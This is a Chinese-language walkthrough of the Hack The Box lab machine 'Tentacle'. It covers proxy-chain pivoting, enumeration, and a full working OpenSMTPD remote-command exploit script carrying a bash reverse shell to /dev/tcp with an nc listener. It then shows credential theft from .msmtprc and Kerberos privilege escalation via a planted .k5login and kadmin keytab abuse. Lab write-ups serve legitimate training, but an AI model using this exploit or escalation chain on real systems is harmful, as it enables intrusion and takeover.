基本信息

端口扫描

很费时间:

1
2
3
4
5
6
7
8
9
10
11
12
13
➜  ~ nmap -sT -Pn 10.10.10.224
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-28 10:10 EST
Nmap scan report for 10.10.10.224
Host is up (0.069s latency).
Not shown: 805 closed ports, 191 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
88/tcp open kerberos-sec
3128/tcp open squid-http

Nmap done: 1 IP address (1 host up) scanned in 1031.14 seconds

3128

3128是squid代理,直接访问错误信息里给出域名:

53

53端口是dns, 使用3128端口得到的域名对其进行子域名枚举,可以发现一些子域名及内部ip,应该是需要通过squid代理访问:

1
2
3
4
5
6
7
dnsenum --threads 64 --dnsserver 10.10.10.224 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt realcorp.htb

ns.realcorp.htb. 259200 IN A 10.197.243.77
proxy.realcorp.htb. 259200 IN CNAME ns.realcorp.htb.
ns.realcorp.htb. 259200 IN A 10.197.243.77
wpad.realcorp.htb. 259200 IN A 10.197.243.31
ns.realcorp.htb. 259200 IN A 10.197.243.77

proxychains

根据得到的信息一步步枚举及尝试,最终的完整代理链:

1
2
3
4
5
6
7
8
9
10
# proxychains conf
http 10.10.10.224 3128
http 127.0.0.1 3128
http 10.197.243.77 3128

# kali
proxychains4 firefox wpad.realcorp.htb

# hosts
10.197.243.31 wpad.realcorp.htb

nmap

然后通过代理链进行枚举:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
➜  ~ proxychains4 nmap 10.197.243.31
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-28 10:09 EST
Nmap scan report for wpad.realcorp.htb (10.197.243.31)
Host is up (0.28s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
464/tcp open kpasswd5
749/tcp open kerberos-adm
3128/tcp open squid-http

Nmap done: 1 IP address (1 host up) scanned in 301.92 seconds

wpad.realcorp.htb

直接通过代理访问是403:

wpad.dat

注意wpad是Web Proxy Auto-Discovery Protocol

1
2
3
4
5
6
7
8
9
10
function FindProxyForURL(url, host) {
if (dnsDomainIs(host, "realcorp.htb"))
return "DIRECT";
if (isInNet(dnsResolve(host), "10.197.243.0", "255.255.255.0"))
return "DIRECT";
if (isInNet(dnsResolve(host), "10.241.251.0", "255.255.255.0"))
return "DIRECT";

return "PROXY proxy.realcorp.htb:3128";
}

10.241.251.0/24

根据wpad配置文件可以发现新的子域10.241.251.0,对其进行探测,发现10.241.251.113的25端口是OpenSMTPD

1
2
3
4
5
6
7
8
9
10
11
12
➜  Tentacle proxychains4 nmap -sC -sV 10.241.251.113
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-28 11:49 EST
Nmap scan report for 10.241.251.113
Host is up (0.28s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp OpenSMTPD
Service Info: Host: smtp.realcorp.htb

Nmap done: 1 IP address (1 host up) scanned in 282.22 seconds

OpenSMTPD

相关漏洞:

1
2
3
proxychains4 python3 smtp_exp.py 10.241.251.113 25 'bash -c "exec bash -i &> /dev/tcp/10.10.14.12/4445 <&1"'

nc -lvvp 4445

exp打到smtp的root:

smtp_exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
import socket, time
import sys
if len(sys.argv) < 4:
print("usage: getShell.py <host> <port> <command>")
exit()
HOST = sys.argv[1]
PORT = int(sys.argv[2])
rev_shell_cmd = sys.argv[3]
payload = b"""\r\n

#0\r\n
#1\r\n
#2\r\n
#3\r\n
#4\r\n
#5\r\n
#6\r\n
#7\r\n
#8\r\n
#9\r\n
#a\r\n
#b\r\n
#c\r\n
#d\r\n
""" + rev_shell_cmd.encode() + b"""
.
"""
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
s = socket.socket(af, socktype, proto)
except OSError as msg:
s = None
continue
try:
s.connect(sa)
except OSError as msg:
s.close()
s = None
continue
break
if s is None:
print('could not open socket')
sys.exit(1)
with s:
data = s.recv(1024)
print('Received', repr(data))
time.sleep(1)
print('SENDING HELO')
s.send(b"helo test.com\r\n")
data = s.recv(1024)
print('RECIEVED', repr(data))
s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")
time.sleep(1)
data = s.recv(1024)
print('RECIEVED', repr(data))
s.send(b"RCPT TO:<j.nakazawa@realcorp.htb>\r\n")
data = s.recv(1024)
print('RECIEVED', repr(data))
s.send(b"DATA\r\n")
data = s.recv(1024)
print('RECIEVED', repr(data))
s.send(payload)
data = s.recv(1024)
print('RECIEVED', repr(data))
s.send(b"QUIT\r\n")
data = s.recv(1024)
print('RECIEVED', repr(data))
print("Exploited Check you netcat :D")
s.close()

信息搜集

.msmtprc

在j.nakazawa用户目录可以发现.msmtprc文件,里面有密码,但这个密码不能直接ssh:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Set default values for all following accounts.
defaults
auth on
tls on
tls_trust_file /etc/ssl/certs/ca-certificates.crt
logfile /dev/null

# RealCorp Mail
account realcorp
host 127.0.0.1
port 587
from j.nakazawa@realcorp.htb
user j.nakazawa
password sJB}RM>6Z~64_
tls_fingerprint C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60

# Set a default account
account default : realcorp

#kerberos

就是通过kerberos生成ticket,然后ssh直接连接,生成ticket后ssh连接不需要密码,如果提示要密码那就是操作有错:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
sudo apt install krb5-user

# /etc/hosts
# hosts只留这一个
10.10.10.224 srv01.realcorp.htb

# /etc/krb5.conf
# 修改/添加对应配置
default_realm = REALCORP.HTB

REALCORP.HTB = {
kdc = 10.10.10.224
}

# shell
kinit j.nakazawa # 密码就是上面得到的
klist
ssh j.nakazawa@10.10.10.224

user flag

然后用户目录得到user.txt:

提权信息

crontab

定时任务发现admin定时运行log_backup.sh:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[j.nakazawa@srv01 ~]$ cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
* * * * * admin /usr/local/bin/log_backup.sh

log_backup.sh

可以看到是定是从squid目录复制文件到admin目录,那么如果我们可以考虑写入认证文件到squid,使其复制到admin,从而我们可以登录:

1
2
3
4
5
6
7
[j.nakazawa@srv01 ~]$ cat  /usr/local/bin/log_backup.sh
#!/bin/bash

/usr/bin/rsync -avz --no-perms --no-owner --no-group /var/log/squid/ /home/admin/
cd /home/admin
/usr/bin/tar czf squid_logs.tar.gz.`/usr/bin/date +%F-%H%M%S` access.log cache.log
/usr/bin/rm -f access.log cache.log

admin

就是写一个.k5login文件进去,使得我们可以用之前生成的ticket以admin用户身份登录:

1
2
3
4
5
6
7
.k5login
j.nakazawa@REALCORP.HTB

cp .k5login /var/log/squid

# 尝试几次,同步需要时间
ssh admin@srv01.realcorp.htb

klist

当前admin用户,klist发现很多ticket:

那么什么是keytab文件?

Keytab是一个文件,其中包含Kerberos主体和加密密钥对(从Kerberos密码派生)。您可以使用keytab文件使用Kerberos对各种远程系统进行身份验证,而无需输入密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[admin@srv01 ~]$ klist -k /etc/krb5.keytab
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 host/srv01.realcorp.htb@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/changepw@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB
2 kadmin/admin@REALCORP.HTB

exploit

所以我们可以利用kadmin去创建一个root ticket:

1
2
3
4
kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB

add_principal root@REALCORP.HTB
# 密码自己设置

root flag

然后ksu切到root,得到root.txt:

参考资料